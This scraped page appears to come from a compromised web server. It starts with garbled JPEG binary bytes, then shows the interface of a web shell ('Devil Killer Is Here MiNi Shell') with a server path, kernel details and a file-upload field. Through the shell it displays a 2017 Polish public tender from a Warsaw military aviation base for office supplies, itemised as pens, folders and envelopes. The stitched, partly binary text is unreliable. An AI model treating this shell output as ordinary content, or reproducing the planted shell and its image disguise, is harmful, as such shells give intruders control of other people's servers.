JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170411/63631-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 63631 - 2017
              z dnia 2017-04-11 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Dostawa materiałów i artykułów biurowych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>1. Baza Lotnictwa Transportowego, krajowy numer identyfikacyjny
              1008894930000, ul.
              Żwirki i Wigury 
              1c,
              00-909  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              261 821 316, e-mail
              zampubl@ron.mil.pl, faks
              261 821 316.
              <br />
              Adres strony internetowej (URL): www.1bltr.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: 1. Baza Lotnictwa Transportowego</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />http://1bltr.wp.mil.pl/pl/index.html</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />ul. Żwirki i Wigury 1c, 00-909 Warszawa, bud. 51 pok. 212</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa materiałów i artykułów biurowych<br /><b>Numer referencyjny: </b>10/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1	atrament do pióra parker 57 ml - kolor niebieski	szt.	20
2	automat samotuszujący o polu min. 58x22 mm, zamykany, z okienkiem na opis pieczątki - różne kolory	szt.	20
3	automat samotuszujący o polu min. 47x18 mm, zamykany, z okienkiem na opis pieczątki - różne kolory	szt.	20
4	brulion kratka, twarda oprawa, B5/160 kartek	szt.	120
5	cienkopis z fibrową końcówką oprawioną w metal, wypełniony tuszem typu dry safe,szerokość linii pisania 0,3 mm, minimum na skuwkce lub klipsie zaznaczony kolor tuszu, obudowa z PP o przekroju trójkąta - minimum w 1/3 długości obudowy, nazwa producenta  oraz typ podany na obudowie (kpl 4 kolory) w fabrycznym, sztywnym, wytłaczanym etui	kpl.	200
6	cienkopis z fibrową końcówką oprawioną w metal, szerokość linii pisania 0,3 mm, skuwka z klipsem w kolorze tuszu, obudowa z PP o przekroju trójkąta, nazwa producenta  oraz typ podany na obudowie, kolor niebieski 	szt.	100
7	cienkopis z fibrową końcówką oprawioną w metal, szerokość linii pisania 0,3 mm, skuwka z klipsem w kolorze tuszu, obudowa z PP o przekroju trójkąta, nazwa producenta  oraz typ podany na obudowie, kolor czarny	szt.	100
8	cienkopis automatyczny kulkowy 0,5 mm, grubość lini pisania 0,25 mm, klips i końcówka ze stali nierdzewnej, kolor czarny	szt.	500
9	cienkopis automatyczny kulkowy 0,5 mm, grubość lini pisania 0,25 mm, klips i końcówka ze stali nierdzewnej, kolor niebieski	szt.	500
10	cienkopis automatyczny kulkowy 0,5 mm, grubość lini pisania 0,25 mm, klips i końcówka ze stali nierdzewnej, kolor czerwony	szt.	100
11	cienkopis z igłową końcówką, wymiennym wkładem, skuwka z klipsem w kolorze tuszu, obudowa z PP, z silikonową końcówką umożliwiającą poprawienie błędu, szerokość lini pisania 0,25 mm, tusz metamo, nazwa producenta oraz typ podany na obudowie, kolor niebieski	szt.	240
12	cienkopis z igłową końcówką, wymiennym wkładem, skuwka z klipsem w kolorze tuszu, obudowa z PP, z silikonową końcówką umożliwiającą poprawienie błędu, szerokość lini pisania 0,25 mm, tusz metamo, nazwa producenta oraz typ podany na obudowie, kolor czarny	szt.	240
13	cienkopis z igłową końcówką, wymiennym wkładem, skuwka z klipsem w kolorze tuszu, obudowa z PP, z silikonową końcówką umożliwiającą poprawienie błędu, szerokość lini pisania 0,25 mm, tusz metamo, nazwa producenta oraz typ podany na obudowie, kolor czerwony	szt.	120
14	cienkopis z igłową końcówką, wymiennym wkładem, skuwka z klipsem w kolorze tuszu, obudowa z PP, z silikonową końcówką umożliwiającą poprawienie błędu, szerokość lini pisania 0,25 mm, tusz metamo, nazwa producenta oraz typ podany na obudowie, kolor zielony	szt.	120
15	długopis automatyczny, z wymiennym wkładem olejowym, wodoodpornym, szerokość linii pisania do 0,21 mm, długość linii pisania min. 1100 m, z mechanizmem chowania wkładu, z gumowym  uchwytem z rowkowatymi wgłębieniami w kolorze tuszu,  klips w kolorze tuszu, obudowa przezroczysta, wkład czarny	szt.	600
16	długopis automatyczny, z wymiennym wkładem olejowym, wodoodpornym, szerokość linii pisania do 0,21 mm, długość linii pisania min. 1100 m, z mechanizmem chowania wkładu, z  gumowym  uchwytem z rowkowatymi wgłębieniami w kolorze tuszu,  klips w kolorze tuszu, obudowa przezroczysta, wkład czerwony 	szt.	400
17	długopis automatyczny, z wymiennym wkładem olejowym, wodoodpornym, szerokość linii pisania do 0,21 mm, długość linii pisania min. 1100 m,  z mechanizmem chowania wkładu, z  gumowym  uchwytem z rowkowatymi wgłębieniami w kolorze tuszu,  klips w kolorze tuszu, obudowa przezroczysta, wkład niebieski	szt.	1200
18	długopis automatyczny, z wymiennym wkładem olejowym, wodoodpornym, szerokość linii pisania do 0,21 mm, długość linii pisania min. 1100 m, z mechanizmem chowania wkładu, z  gumowym  uchwytem z rowkowatymi wgłębieniami w kolorze tuszu,  klips w kolorze tuszu, obudowa przezroczysta, wkład zielony	szt.	120
19	długopis z wymiennym wkładem o grubości linii pisania do 0,21 mm i długości linii pisania min.1700 m,  z końcówką 0,7 mm  z kulką wykonaną z hartowanej stali, wkład czarny	szt.	1000
20	długopis z wymiennym wkładem o szerokości linii pisania do 0,21 mm i długości linii pisania min.1700 m, z  końcówką 0,7 mm z kulką wykonaną z hartowanej stali, wkład czerwony	szt.	240
21	długopis z wymiennym wkładem  o szerokości linii pisania do 0,21 mm i długości linii pisania min.1700 m,  z końcówką 0,7 mm  z kulką wykonaną z hartowanej stali, wkład niebieski	szt.	2000
22	długopis z wymiennym wkładem o szerokości linii pisania do 0,21 mm i długości linii pisania min.1700 m, z metalową końcówką 0,7 mm, wkład zielony	szt.	120
23	długopis automatyczny z wymiennym, metalowym wkładem wielkopojemnym, górna część obudowy ośmiokątna, wykonana ze lśniącego tworzywa, wykończenia niklowane (okuwka, obrączka oraz klips), dolna część obudowy zakończona metalowym elementem trwale zamocowanym, grawerka  producenta na klipsie, szerokość linii pisania 0,7-0,8 mm, długość linii pisania min. 2500 mm, dostępny w min. 7 kolorach, wkład niebieski	szt.	500
24	długopis żelowy z wymiennym wkładem, w przezroczystej  obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką wykonaną ze wzmacnianej stali nierdzewnej, szerokość linii pisania do 0,25 mm, długość linii pisania min.1100 m, wkład czarny	szt.	600
25	długopis żelowy z wymiennym wkładem, w przezroczystej  obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką wykonaną ze wzmacnianej stali nierdzewnej, szerokość linii pisania do 0,25 mm, długość linii pisania min.1100m, wkład niebieski	szt.	600
26	długopis automatyczny, żelowy, z wymiennym wkładem, mechanizm chowania wkładu w kolorze tuszu, szerokość linii pisania  do 0,25 mm, długość linii pisania min.1300 m, z klipsem ,nazwa producenta  naniesiona na klips, wkład czarny	szt.	500
27	długopis automatyczny, żelowy, z wymiennym wkładem, mechanizm chowania wkładu w kolorze tuszu, szerokość linii pisania  do 0,25 mm, długość linii pisania min.1300m, z klipsem, nazwa producenta  naniesiona na klips, wkład niebieski	szt.	1000
28	dziurkacz dwuotworowy, metalowy, o zaokrąglonym ergonomicznym kształcie, z ogranicznikiem formatów A6/A5/A4/888, z certyfikatem bezpieczeństwa GS, dziurkujący min. 25 kartek	szt.	100
29	etykiety samoprzylepne z zaokrąglonymi rogami, uniwersalne, kolor biały, z certyfikatem FSC, wymiary 99x38 mm (tolerancja+/- 1 mm), (op. 100szt.)	op.	50
30	etykiety samoprzylepne do segregatorów o szerokości grzbietu 7 cm, wymiary 54x153 mm, (op. 20szt.)	op.	50
31	flamastry z wentylowaną skuwką, sześciokątna obudowa w kolorze tuszu, końcówka z włókna o średnicy 1,7-1,8 mm, grubośc linii pisania 1mm, odporne na wysychanie przez okres min. 5 lat, łatwo spieralny tusz, kpl. 6 kol. w fabrycznym etui	kpl.	100
32	flamastry z wentylowaną skuwką, sześciokątna obudowa w kolorze tuszu, końcówka z włókna o średnicy 1,7-1,8 mm, grubośc linii pisania 1mm, odporne na wysychanie przez okres min. 5 lat, łatwo spieralny tusz, kpl. 4 kol. w fabrycznym etui	kpl.	100
33	flamaster, wykonany z polipropylenu, końcówka z włókna o średnicy 1,7-1,8mm, odporny na wysychanie przez okres min. 3 lat, łatwo spieralny tusz, kolor czarny	szt.	100
34	folia przezroczysta samoprzylepna, formatu A4, umożliwiająca wydruk z drukarki laserowej i ksero, folia o grubości do 75 mic na podłożu poliestrowym, możliwość kopiowania ze stosu (op. 100 szt.)	op.	10
35	folia do laminatora na gorąco, A3, grubość 125 mic., obustronnie przezroczysta, (op.100 szt.)	op.	20
36	folia do laminatora na gorąco, A4, grubość 125 mic., obustronnie matowa (op.100 szt.)	op.	20
37	folia samoprzylepna błyszcząca na podkładzie nacinanym, B2, kolor biała	szt.	20
38	folia samoprzylepna błyszcząca na podkładzie nacinanym, B2, kolor czarna	szt.	20
39	folia samoprzylepna błyszcząca na podkładzie nacinanym, B2, kolor czerwona	szt.	20
40	folia samoprzylepna błyszcząca na podkładzie nacinanym, B2, kolor niebieska	szt.	20
41	folia samoprzylepna błyszcząca na podkładzie nacinanym, B2, kolor zielona	szt.	20
42	folia samoprzylepna błyszcząca na podkładzie nacinanym, B2, kolor żółta	szt.	20
43	foliopis uniwersalny napełniony wodoodpornym tuszem typu dry safe, czas schnięcia do 4 sekund, skuwka w kolorze tuszu, szerokość linii pisania 0,4 mm, z możliwością napełnienia stacją dozującą, kolor czarny	szt.	100
44	foliopis uniwersalny napełniony wodoodpornym tuszem typu dry safe, czas schnięcia do 4 sekund, skuwka w kolorze tuszu, szerokość linii pisania 0,6 mm, kpl. 4 kolory w etui (czarny, czerwony, niebieski, zielony)	kpl.	100
45	listwy do oprawy dokumentów formatu A4, 2 rogi zaokrąglone, grubość wypełnienia do 30 kartek, (op. 50 szt.), kolor czarny i ciemno-niebieski  w równych ilościach każdego koloru	op.	50
46	listwy do oprawy dokumentów formatu A4, 2 rogi zaokrąglone, grubość wypełnienia do 60 kartek, (op. 50szt.), kolor czarny i ciemno-niebieski, w równych ilościach każdego koloru	op.	50
47	listwy do oprawy dokumentów formatu A4, 2 rogi zaokrąglone, grubość wypełnienia do 120 kartek, (op. 25 szt.), kolor czarny	op.	10
48	listwy do oprawy dokumentów formatu A4, 2 rogi zaokrąglone, grubość wypełnienia do 150 kartek, (op. 25 szt.), kolor czarny	op.	10
49	grzbiety do bindownicy,  10mm, (op. 100 szt.), kolor niebieski, czarny - jednakowe ilości.	op.	20
50	grzbiety do bindownicy,  12mm, (op. 100 szt.), kolor niebieski, czarny - jednakowe ilości,	op.	10
51	grzbiety do bindownicy,  16mm, (op. 100 szt.), kolor niebieski, czarny - jednakowe ilości,	op.	10
52	grzbiety do bindownicy,  20mm, (op. 100 szt.), kolor niebieski, czarny - jednakowe ilości.	op.	10
53	grzbiety do bindownicy,  22mm, (op. 50 szt.), kolor niebieski, czarny - jednakowe ilości.	op.	10
54	grzbiety do bindownicy,  28mm, (op. 50 szt.), kolor niebieski, czarny - jednakowe ilości.	op.	10
55	grzbiety do bindownicy,  38mm, (op. 50 szt.), kolor niebieski, czarny - jednakowe ilości.	op.	10
56	grzbiety do bindownicy,  6mm, (op. 100 szt.), kolor niebieski, czarny - jednakowe ilości.	op.	10
57	grzbiety do bindownicy,  8mm, (op. 100 szt.), kolor niebieski, czarny - jednakowe ilości.	op.	10
58	gumki recepturki, mix kolorów, op. 25 g	op.	100
59	podkład na biurko - kalendarz biuwar o wymiarach 590x395 mm (długość +/- 4mm; szerokość +/- 25mm), posiadający dwuletni nadruk (2017/2018), godzinowy plan tygodnia oraz dużo miejsca na notatki. Dół kalendarza zabezpieczony listwą chroniąca przed zaginaniem kartek.	szt.	100
60	kalka techniczna A4 o gramaturze powyżej 90 g/m2, doskonała przezroczystość, gładkie wykończenie, odporna na wielokrotne wymazywanie oraz drapanie, neutralne pH, umożliwia kreślenie ołówkiem, tuszem i pisakiem (op. 100 ark.)	op.	30
61	kartki samoprzylepne usuwalne, w opakowaniu 3 bloczki po 100 kartek o wymiarach 51x38 mm, żółte 	op.	800
62	kartki samoprzylepne, usuwalne, w bloczku 100 kartek, o wymiarach 76x51mm, żółte	op.	600
63	kartki samoprzylepne, usuwalne, w bloczku 100 kartek, o wymiarach 76x76mm, żółte	op.	1200
64	kartki samoprzylepne, harmonijkowe, w bloczku 100 kartek, o gramaturze 75 g/m2, o wymiarach 76x76 mm, do stosowania z podajnika, żółte	szt.	800
65	kartki samoprzylepne, usuwalne, w komplecie 4 różnokolorowe bloczki po 50 kartek, o gramaturze 75 g/m2, o wymiarach 20x50 mm	szt.	400
66	karteczki  kolorowe klejone o wymiarach 85x85x40 mm, 5 pastelowych kolorów w kostce, każda kostka w foli ochronnej	szt.	500
67	klej w sztyfcie 40g, wysokiej jakości bez rozpuszczalników, do klejenia papieru, kartonu, tekstyli oraz styropianu, zawierający barwniki spożywcze, z odkręcaną nakrętką	szt.	500
68	klej wikol w tubie, poj min. 45 ml.	szt.	120
69	klipsy do papieru, 19 mm, (op. 12 szt.)	szt.	300
70	klipsy do papieru, 32 mm, (op. 12 szt.)	szt.	300
71	klipsy do papieru, 51 mm, (op. 12 szt.)	szt.	300
72	kołonotatnik, format A5 plus, w bardzo twardej  lakierowanej okładce, gramatura papieru min 80 g/m2, 80 kartkowy w kratkę, z otworami umożliwiającymi wpięcie kartek do każdego rodzaju segregatora, z mikroperforacją i podwójną spiralą	szt.	100
73	koperta B4  HK, brązowa, wykonana z papieru o gramaturze min. 130 g/m2, samoklejąca z paskiem, (op. 250 szt.)	op.	20
74	koperta B4 RBD HK, brązowa, wykonana z papieru o gramaturze min. 130 g/m2, samoklejąca z paskiem, (op. 250 szt.)	op.	15
75	koperta B5, HK, brązowa, wykonana z papieru o gramaturze min. 120g/m2, samoklejąca z paskiem, (op. 500 szt.)	op.	10
76	koperta B6, biała, wykonana z papieru o gramaturze min. 100 g/m2, samoklejąca z paskiem, (op. 1000 szt.)	op.	10
77	koperta C4, brązowa HK, wykonana z papieru o gramaturze min. 100 g/m2, samoklejąca z paskiem, (op. 250 szt.)	op.	20
78	koperta C4 RBD HK, brązowa, wykonana z papieru o gramaturze min. 130 g/m2, samoklejąca z paskiem, (op. 250 szt.)	op.	20
79	koperta DL, biała wykonana z papieru o gramatyrze min. 80 g/m2, samoklejąca z paskiem (op. 1000 szt.)	op.	10
80	korektor w płynie 20 ml, szybko schnący, zawierający kulkę ułatwiającą mieszanie	szt.	120
81	korektor w taśmie, w przezroczystej obudowie, z ruchomym mechanizmem zabezpieczającym taśmę przed uszkodzeniem, szer. taśmy 4,2-5 mm, dł. min.  14 m	szt.	360
82	korektor  w kształcie pióra, szybkoschnący, z cienko piszącą metalową końcówką, pojemność min. 9 ml	szt.	360
83	koszulki na dokumenty A5, krystaliczne, otwierane u góry, wykonane z ekologicznej folii polipropylenowej o grubości min 50 mic., antyelektrostatyczne (op. 100 szt.)	op.	20
84	koszulki na dokumenty A4, antyelektrostatyczne, z harmonijkowym brzegiem i dnem, wykonane z przeroczystej folii propylenowej o grubości min. 170 mic, mieszczące min. 200 kartek o gramaturze 80g/m2, zamykane od góry klapką, specjalnie wzmocniony perforowany brzeg (op. 5 szt.)	op.	100
85	koszulki na dokumenty A4, krystaliczne, otwierane u góry, wykonane z ekologicznej folii polipropylenowej o grubości min 120 mic., antyelektrostatyczne, ze specjalnie wzmocnionym brzegiem (op. 100 szt. w kartoniku)	op.	50
86	kredki grube,  w okrągłej, drewnianej oprawie, długość kredki 15 cm (+/- 0,5 cm), wkład o grubości 6 mm (+/- 1 mm), kpl. 6 kolorów w etui  	kpl.	120
87	kredki grube,  w okrągłej, drewnianej oprawie, długość kredki 15 cm (+/- 0,5 cm), wkład o grubości 6 mm (+/- 1 mm), kpl. 12 kolorów w etui 	kpl.	120
88	linijka 100 cm z anodowanego aluminium, z wkładką antypoślizgową pod spodem, z nadrukowaną podziałką (mm)	szt.	25
89	linijka 30 cm z anodowanego aluminium, z wkładką antypoślizgową pod spodem, z nadrukowaną podziałką (mm)	szt.	50
90	linijka 50 cm z anodowanego aluminium, z wkładką antypoślizgową pod spodem, z nadrukowaną podziałką (mm)	szt.	30
91	linijka 30 cm z anodowanego aluminium, z dwoma skalami, z nadrukowaną podziałką (mm), z uchwytem oraz wkładką antypoślizgową pod spodem	szt.	50
92	linijka 100 cm z przezroczystego polistyrenu, nieścieralna podziałka, podcięte brzegi umożliwiające precyzyjne kreślenie	szt.	20
93	linijka 20 cm z przezroczystego polistyrenu, nieścieralna podziałka, podcięte brzegi umożliwiające precyzyjne kreślenie	szt.	100
94	linijka 30 cm z przezroczystego polistyrenu, nieścieralna podziałka, podcięte brzegi umożliwiające precyzyjne kreślenie	szt.	100
95	marker z tuszem olejowym, wodoodpornym, odpornym na ścieranie, na działanie światła i warunków atmosferycznych,  z okrągłą końcówką, szerokość linii pisania 2,2-2,8 mm, kolor biały	szt.	60
96	marker z tuszem olejowym, wodoodpornym, odpornym na ścieranie, na działanie światła i warunków atmosferycznych, z cienką okrągłą końcówką wzmocnioną metalową obudową pozwalającą  pisać precyzyjnie, szerokość linii pisania do 1,2 mm, kolor biały	szt.	60
97	marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperature do 100° C, z okrągłą końcówką, szerokość linii pisania 2,5 mm, kolor czarny	szt.	300
98	marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperature do 100° C, z okrągłą końcówką, szerokość linii pisania 2,5 mm, kolor czerwony	szt.	50
99	marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperature do 100o C, z okrągłą końcówką, szerokość linii pisania 2,5 mm, kolor niebieski	szt.	50
100	marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperature do 100° C, ze ściętą końcówką, szerokość linii pisania 2-5 mm, kolor czarny	szt.	50
101	marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperature do 100° C, ze ściętą końcówką, szerokość linii pisania 2-5 mm, kolor czerwony	szt.	50
102	pisak do tablic suchościeralnych, z okrągłą końcówką, z płynnym tuszem dozowanym  za pomocą specjalnej pompki, długość linii pisania min.1000 m, grubość końcówki do 4 mm, (kpl. 4 kolory), w zestawie z gąbką.	kpl.	50
103	naboje atramentowe do pióra typu Parker, długie, kolor czarny (op. kartonowe 5 szt)	op.	100
